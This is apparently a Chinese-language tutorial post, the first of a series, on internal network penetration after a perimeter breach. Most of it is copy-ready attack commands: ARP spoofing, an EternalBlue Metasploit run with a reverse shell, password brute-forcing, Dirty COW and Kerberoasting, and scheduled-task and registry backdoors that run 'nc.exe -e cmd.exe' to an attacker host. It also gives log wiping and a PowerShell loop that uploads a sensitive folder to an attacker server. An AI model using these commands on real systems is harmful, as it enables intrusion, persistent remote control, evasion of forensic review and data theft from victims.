1. 内网渗透概述
- 定义与背景:内网渗透指的是攻击者在成功入侵网络外围防线后,进一步攻击内网中的其他主机和资源的过程。内网渗透的目标通常是获取敏感信息、控制关键资源,或者进一步扩展攻击面的范围。
- 常见的内网结构与防御措施:在了解内网渗透之前,熟悉典型的内网结构(如域环境)和常见的防御措施(如防火墙、IDS/IPS、网络分段)非常重要。
2. 信息收集
-
网络扫描与主机发现:
- 使用Nmap:在内网中进行扫描,发现活跃主机、开放端口和服务。
- 代码示例:
nmap -sP 192.168.1.0/24 nmap -sV -p- 192.168.1.101 - 使用Netdiscover:快速发现内网中的活跃主机。
- 代码示例:
netdiscover -i eth0 -r 192.168.1.0/24操作系统指纹识别与服务枚举:
- 使用Nmap的OS检测:获取主机的操作系统信息。
- 代码示例:
nmap -O 192.168.1.101 - 服务枚举与版本探测:通过探测服务版本,获取进一步的信息。
- 代码示例:
nmap -sV 192.168.1.101ARP缓存中毒与嗅探:
- 使用Ettercap:通过ARP欺骗,嗅探内网中的数据流量。
- 代码示例:
ettercap -T -q -M arp:remote /192.168.1.101/ /192.168.1.1/3. 内网漏洞利用
- 服务漏洞利用:
- 利用MS17-010漏洞:通过
EternalBlue利用Windows SMB服务漏洞。 - 代码示例:
msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.1.101 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.102 run弱口令爆破:
- 使用Hydra或Medusa:对常见服务(如SSH、SMB、RDP)进行弱口令爆破。
- 代码示例:
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.1014. 权限提升
- 本地提权:
- 内核漏洞利用:通过常见的内核漏洞进行提权(如Dirty COW)。
- 代码示例:
gcc -o dirtycow dirtycow.c ./dirtycow - 利用配置错误:如SUID、SGID位错误配置导致的提权。
- 代码示例:
find / -perm -4000 -type f 2>/dev/null域用户提权:
- 利用Kerberoasting攻击:获取域服务账号的哈希值进行破解。
- 代码示例:
GetUserSPNs.py -dc-ip 192.168.1.1 -request -usersfile users.txt5. 持久化与后门
- 持久化后门:
- 计划任务与服务持久化:在目标主机上设置计划任务,确保持久访问。
- 代码示例:
schtasks /create /sc onstart /tn "SysUpdate" /tr "C:\windows\system32\nc.exe -e cmd.exe 192.168.1.102 4444" /ru SYSTEM注册表后门:
- 通过注册表设置持久化后门:
- 代码示例:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SysUpdate /t REG_SZ /d "C:\windows\system32\nc.exe -e cmd.exe 192.168.1.102 4444"6. 隐匿与数据窃取
-
隐匿技术:
- 日志清理与遮掩:通过清理系统日志和删除历史命令,掩盖攻击痕迹。
- 代码示例:
wevtutil cl System del /f /s /q %UserProfile%\Recent\*数据窃取与流量分析:
-
通过
PowerShell数据导出:使用PowerShell将数据导出到攻击者控制的服务器。
- 代码示例:
powershell -c "$files = Get-ChildItem C:\Sensitive\; foreach ($file in $files) {Invoke-WebRequest -Uri http://192.168.1.102/upload -Method POST -InFile $file.FullName}"好了,通过以上的初步了解,大家应该知道怎么操作了,咱们第二篇继续学习了解内网渗透。
- 利用MS17-010漏洞:通过
468
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
